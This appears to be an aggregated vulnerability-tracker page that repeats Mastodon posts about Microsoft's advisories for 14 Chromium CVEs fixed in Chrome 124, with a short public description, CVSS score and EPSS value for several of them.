screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3845(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T06:31:27

2 posts

Inappropriate implementation in Networks in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass mixed content policy via a crafted HTML page. (Chromium security severity: Low)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3843(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T06:31:27

2 posts

Insufficient data validation in Downloads in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3834
(8.8 HIGH)

EPSS: 0.08%

updated 2024-04-28T06:31:26

2 posts

Use after free in Downloads in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3837
(8.8 HIGH)

EPSS: 0.08%

updated 2024-04-28T06:31:26

2 posts

Use after free in QUIC in Google Chrome prior to 124.0.6367.60 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3840(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T06:31:26

2 posts

Insufficient policy enforcement in Site Isolation in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3833(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T06:31:26

2 posts

Object corruption in WebAssembly in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3841(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-28T06:31:26

2 posts

Insufficient data validation in Browser Switcher in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to inject scripts or HTML into a privileged page via a malicious file. (Chromium security severity: Medium)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3839
(6.5 MEDIUM)

EPSS: 0.08%

updated 2024-04-28T06:31:26

2 posts

Out of bounds read in Fonts in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

